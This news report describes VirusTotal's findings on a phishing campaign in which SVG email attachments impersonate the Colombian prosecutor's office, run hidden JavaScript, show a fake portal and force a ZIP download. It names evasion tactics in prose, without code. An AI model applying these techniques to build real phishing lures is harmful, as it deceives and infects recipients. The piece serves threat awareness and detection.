Redazione RHC : 5 September 2025 17:33
Cybercriminals have launched a new wave of attacks using SVG files to distribute phishing pages. Experts at VirusTotal have reported that attackers are impersonating the Colombian prosecutor’s office, distributing email attachments containing hidden JavaScript code. Automatic analysis revealed behaviors that antivirus programs were unable to detect.
The SWF format, formally “dead” since Flash was deactivated in 2020, continues to appear in traffic. In 30 days, VirusTotal received 47,812 previously unknown unique SWF files, and 466 of them triggered at least one antivirus engine. In one case, only three out of 63 triggers indicated “suspicious” signs of an old vulnerability, but detailed analysis revealed it to be a complex game with 3D rendering, audio, and a built-in level editor.
Obfuscated classes, use of RC4/AES, and system information gathering seemed alarming, but were consistent with the logic of protection against cheating and modification. No malicious behavior was detected in these artifacts.
SVG is the opposite of both, in spirit and in time: an open standard for web and design. That’s why it’s favored by attackers. Over the past 30 days, VirusTotal has received 140,803 unique, previously unknown SVG files, of which 1,442 were reported by at least one engine. One of the samples was not detected by any engine, but during rendering, it executed an embedded script that decoded and embedded a phishing HTML page copying the Colombian justice system portal. To make it more believable, the page simulated document loading with a progress bar, and in the background, a ZIP archive was downloaded and forced. The behavior was confirmed in the sandbox: visual elements, numbers, and “security tokens” were present, even though it was only an SVG image.
According to VirusTotal, this is not an isolated case. A type:svg query mentioning Colombia returned 44 unique SVGs, all undetected by antivirus, but using the same tactics: obfuscation, polymorphism, and large “garbage” code to increase entropy. At the same time, the scripts still contained Spanish comments such as “POLIFORMISMO_MASIVO_SEGURO” and “Funciones dummy MASIVAS”, a vulnerability suitable for a simple YARA signature.
A year-long search yielded 523 results. The oldest sample was dated August 14, 2025, also downloaded from Colombia, and was also undetected. A new analysis confirmed the same phishing and stealth download pattern. The initial samples were larger, about 25 MB, but then the size decreased, indicating a payload refinement.
The distribution channel was email, which allowed us to link the chain based on sender metadata, subject lines, and attachment names.
Redazione